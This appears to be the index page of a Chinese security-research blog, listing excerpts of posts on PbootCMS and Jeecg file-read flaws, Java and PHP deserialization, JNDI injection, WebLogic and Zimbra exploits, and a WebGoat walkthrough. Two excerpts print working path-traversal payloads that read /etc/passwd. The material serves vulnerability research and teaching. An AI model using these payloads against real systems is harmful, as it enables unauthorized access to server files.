原创 LFI in PbootCMS v2.x

GET /pbootcms/index.php?search=&searchtpl=/....//....//....//....//....//....//etc/passwd HTTP/1.1 Host: localhost

原创 談談log4j的反序列化

文章發佈在安全客:https://www.anquanke.com/post/id/195932

原创 從安洵杯學習thinkphp 6.x反序列化POP鏈

前言 剛剛過去的安洵杯,裏面有一道iamthinking的題目(好像是這個名字吧),裏面考察到了tp6的反序列化(通過訪問www.zip可以下載源碼),按照慣例,我還是沒有做出來,我不知道咋繞過那個正則emmmm,給沒有做題的大師

原创 灰盒方式通關WebGoat 8

SQL Injection (intro) 0x02 select department from employees where first_name='Bob'; 0x03 update employees set depar

原创 Jeecg 任意文件下載漏洞

payload: localhost:8080/jeecg_war/chat/imController/showOrDownByurl.do?dbPath=../../etc/passwd&down=1 它默認的文件路徑是D://

原创 利用docker搭建php調試環境(phpstorm+xdebug)

前言 最近審計php代碼發現手動打印變量實在是太累了,不能快速的瞭解目標應用程序的運行邏輯。還是決定轉戰xdebug,下面是一些簡單的記錄…真香 docker環境獲取 爲什麼用docker來搭建調試環境呢?一是本地搭建比較麻煩,二

原创 【入坑JAVA安全】手把手教你寫反序列化POC

0x01 前言 前面,我們瞭解了java的序列化機制,也知道在什麼情況下會出現漏洞,爲了對反序列化漏洞有個更直觀的認識,這裏就來說一說存在於apache commons-collections.jar中的一條pop鏈,要知道這個類

原创 2019總結&2020規劃

2019總結 去年做的比較好的一點就是一直在堅持做階段性總結,這一個小習慣幫助我糾正了很多學習上的偏差,一直向着我想要達到的目的進發着。 狀態難以轉換 這是老毛病了,從一個狀態過渡到另一個狀態對我來說還是挺難受的,且容易受到環

原创 xdebug的一些攻擊面

前言 偶然看到一篇關於利用xdeubg執行命令的文章,覺得挺有意思的,簡單復現一下利用過程,做一個記錄,原理性的東西就不多講了 原理簡介 xdebug是調試php代碼的工具,遵循DBGp協議。其工作原理大概如下(搬運): ID

原创 【入坑JAVA安全】序列化與反序列化

0x01 什麼是序列化與反序列化? 序列化與反序列化的關鍵函數? 反序列化過後的數據有啥特徵? java反序列化漏洞與php反序列化漏洞的相似之處? 這一章,我們只需要搞清楚前面三個問題就行了,其實java反序列化漏洞的原理很

原创 Zimbra xxe+ssrf導致getshell

Zimbra xxe+ssrf to RCE 前言 2019年3月13號,國外一名安全研究員在他的博客上公佈了zimbra的這起漏洞,但是其中並未提到一些漏洞的利用細節,在此我將整個漏洞的利用過程進行復現。 原文鏈接:https

原创 cve-2018-3191

漏洞利用前提 影響版本 WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.2 WebLogic 12.2.1.3 配置 開啓T3協議(默認開啓) 漏洞利用方法 生成

原创 【入坑JAVA安全】在?進來看看怎麼攻擊JMX吧

前言 這一章我們來說說JMX的安全問題把,內容相對來說比較簡單,當然,我們還是回給出幾個相關的案例 JMX簡介 JMX(Java Management Extensions,即Java管理擴展)是一個爲應用程序、設備、系統等植入管

原创 【入坑JAVA安全】fastjson中的jndi注入

0x01 前言 前一章簡單介紹了jndi注入的知識,這一章主要是分析一下fastjson 1.2.24版本的反序列化漏洞,這個漏洞比較普遍的利用手法就是通過jndi注入的方式實現RCE,所以我覺得是一個挺好的JNDI注入實踐案例。

原创 【入坑JAVA安全】老公,JNDI注入是什麼呀?

0x01 前言 我們在上一章《攻擊rmi的方式》中提到了rmi的一大特性——動態類加載。而jndi注入就是利用的動態類加載完成攻擊的。在談jndi注入之前,我們先來看看關於jndi的基礎知識 0x02 jndi是個啥 jndi的全